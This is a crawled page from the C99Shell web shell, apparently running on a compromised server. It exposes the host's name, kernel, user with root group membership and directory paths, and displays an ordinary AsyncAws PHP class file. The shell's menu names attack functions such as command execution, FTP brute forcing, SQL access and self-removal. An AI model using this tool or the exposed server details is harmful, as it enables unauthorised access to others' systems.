!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/picomail.picotech.app/public_html/vendor/async-aws/core/src/   drwxr-xr-x
Free 28.53 GB of 117.98 GB (24.18%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     RequestContext.php (2.46 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

namespace AsyncAws\Core;

use 
AsyncAws\Core\Exception\InvalidArgument;

/**
 * Contains contextual information alongside a request.
 *
 * @author Jérémy Derussé <jeremy@derusse.com>
 *
 * @internal
 */
class RequestContext
{
    public const 
AVAILABLE_OPTIONS = [
        
'region' => true,
        
'operation' => true,
        
'expirationDate' => true,
        
'currentDate' => true,
        
'exceptionMapping' => true,
        
'usesEndpointDiscovery' => true,
        
'requiresEndpointDiscovery' => true,
    ];

    
/**
     * @var string|null
     */
    
private $operation;

    
/**
     * @var bool
     */
    
private $usesEndpointDiscovery false;

    
/**
     * @var bool
     */
    
private $requiresEndpointDiscovery false;

    
/**
     * @var string|null
     */
    
private $region;

    
/**
     * @var \DateTimeImmutable|null
     */
    
private $expirationDate;

    
/**
     * @var \DateTimeImmutable|null
     */
    
private $currentDate;

    
/**
     * @var array<string, string>
     */
    
private $exceptionMapping = [];

    
/**
     * @param array{
     *  operation?: null|string
     *  region?: null|string
     *  expirationDate?: null|\DateTimeImmutable
     *  currentDate?: null|\DateTimeImmutable
     *  exceptionMapping?: string[]
     *  usesEndpointDiscovery?: bool
     *  requiresEndpointDiscovery?: bool
     * }
     */
    
public function __construct(array $options = [])
    {
        if (
\count($invalidOptions array_diff_key($optionsself::AVAILABLE_OPTIONS))) {
            throw new 
InvalidArgument(sprintf('Invalid option(s) "%s" passed to "%s". 'implode('", "'array_keys($invalidOptions)), __METHOD__));
        }

        foreach (
$options as $property => $value) {
            
$this->$property $value;
        }
    }

    public function 
getOperation(): ?string
    
{
        return 
$this->operation;
    }

    public function 
getRegion(): ?string
    
{
        return 
$this->region;
    }

    public function 
getExpirationDate(): ?\DateTimeImmutable
    
{
        return 
$this->expirationDate;
    }

    public function 
getCurrentDate(): ?\DateTimeImmutable
    
{
        return 
$this->currentDate;
    }

    public function 
getExceptionMapping(): array
    {
        return 
$this->exceptionMapping;
    }

    public function 
usesEndpointDiscovery(): bool
    
{
        return 
$this->usesEndpointDiscovery;
    }

    public function 
requiresEndpointDiscovery(): bool
    
{
        return 
$this->requiresEndpointDiscovery;
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0035 ]--